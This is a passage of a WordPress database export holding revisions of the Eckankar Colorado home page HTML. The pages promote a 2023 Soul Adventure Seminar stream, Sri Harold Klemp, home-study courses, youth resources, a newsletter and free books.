col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-20 13:28:08','2023-11-20 20:28:08','',7160,'https://eckankar-colorado.org/?p=269406',0,'revision','',0),(269399,2,'2023-11-18 13:34:35','2023-11-18 20:34:35','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls 